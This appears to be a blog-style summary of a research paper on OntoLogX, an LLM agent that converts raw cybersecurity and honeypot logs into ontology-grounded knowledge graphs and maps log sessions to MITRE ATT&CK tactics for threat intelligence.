TLDR: OntoLogX is an autonomous AI agent that uses Large Language Models (LLMs) to convert raw cybersecurity logs into structured, ontology-grounded Knowledge Graphs (KGs). It incorporates Retrieval Augmented Generation (RAG) and iterative correction to ensure semantic and syntactic validity. The system groups KGs into sessions to predict MITRE ATT&CK tactics, linking low-level log data to higher-level adversarial objectives. Evaluated on benchmark and real-world honeypot data, OntoLogX significantly improves the extraction of actionable Cyber Threat Intelligence, demonstrating the value of code-oriented LLMs and ontology-grounded representations.
Cybersecurity threats are constantly evolving, becoming more sophisticated and harder to detect. Traditional defense systems often struggle to keep pace, leading to a critical need for more proactive strategies. A key source of information for understanding these threats lies within system logs, which record attacker behaviors, exploited vulnerabilities, and malicious activities. However, these logs are typically unstructured, inconsistent, and fragmented, making it incredibly difficult to extract meaningful insights.
This is where Cyber Threat Intelligence (CTI) comes in. CTI involves collecting, processing, and analyzing information about threat actors to enable faster and better-informed decisions in cybersecurity operations. Among the most valuable sources for CTI are logs from honeypots, which are systems designed to attract and record malicious interactions, providing a rich dataset of adversarial behavior.
To address the challenges of processing these complex logs, researchers have explored using Knowledge Graphs (KGs). KGs represent concepts, entities, and events, along with the relationships between them, in a way that is closer to human understanding. This structured representation facilitates semantic reasoning and integration with automated workflows.
Recent advancements in Large Language Models (LLMs) have shown remarkable potential in extracting structured information from natural language. However, applying LLMs effectively in specialized domains like cybersecurity, where precise terminology and contextual interpretation are crucial, remains a challenge. Existing approaches often require heavily pre-processed inputs or significant user interaction.
A new autonomous AI agent called OntoLogX has been introduced to tackle these issues. OntoLogX leverages LLMs to transform raw logs directly into ontology-grounded Knowledge Graphs without requiring human intervention. It integrates a lightweight, domain-specific log ontology with Retrieval Augmented Generation (RAG) and iterative correction steps. This ensures that the generated KGs are both syntactically correct and semantically valid.
Beyond just analyzing individual events, OntoLogX aggregates these KGs into sessions. It then uses an LLM to predict MITRE ATT&CK tactics, which are high-level adversarial objectives. This crucial step links low-level log evidence to broader attack strategies, providing a more comprehensive understanding of threat activities.
The methodology of OntoLogX involves several key steps. When a log event arrives, the system first retrieves semantically related KGs from a database to serve as examples for the LLM. The LLM then generates a candidate KG, combining the new log event, optional context, and the domain ontology. This candidate is rigorously validated against ontology constraints. If errors are found, the model is prompted to apply targeted corrections iteratively until a valid representation is achieved. Once validated, the KG is stored, and finally, KGs from the same log session are grouped to predict associated MITRE ATT&CK tactics.
The evaluation of OntoLogX demonstrated its effectiveness in generating ontology-compliant KGs. The retrieval and correction mechanisms significantly improved the precision and recall of information extraction. Interestingly, code-oriented LLMs proved particularly well-suited for this structured log analysis task. The system was tested on both public benchmark logs and a real-world honeypot dataset, showing robust KG generation and accurate mapping of adversarial activity to ATT&CK tactics.
While OntoLogX represents a significant step forward in extracting actionable CTI from logs, the reliance on computationally intensive LLMs presents a scalability challenge for high-throughput environments. Future work aims to explore optimization strategies and extend the ontology to cover more log sources and CTI standards. For more details, you can refer to the full research paper: OntoLogX: Ontology-Guided Knowledge Graph Extraction from Cybersecurity Logs with Large Language Models.
Also Read:
- AI Framework Streamlines Cloud Incident Investigations with Enhanced Accuracy
- SafeEvalAgent: A Dynamic Approach to AI Safety Evaluation
Overall, OntoLogX offers a novel and promising approach to transforming unstructured and heterogeneous logs into valuable intelligence, enhancing proactive and explainable cyber defense.
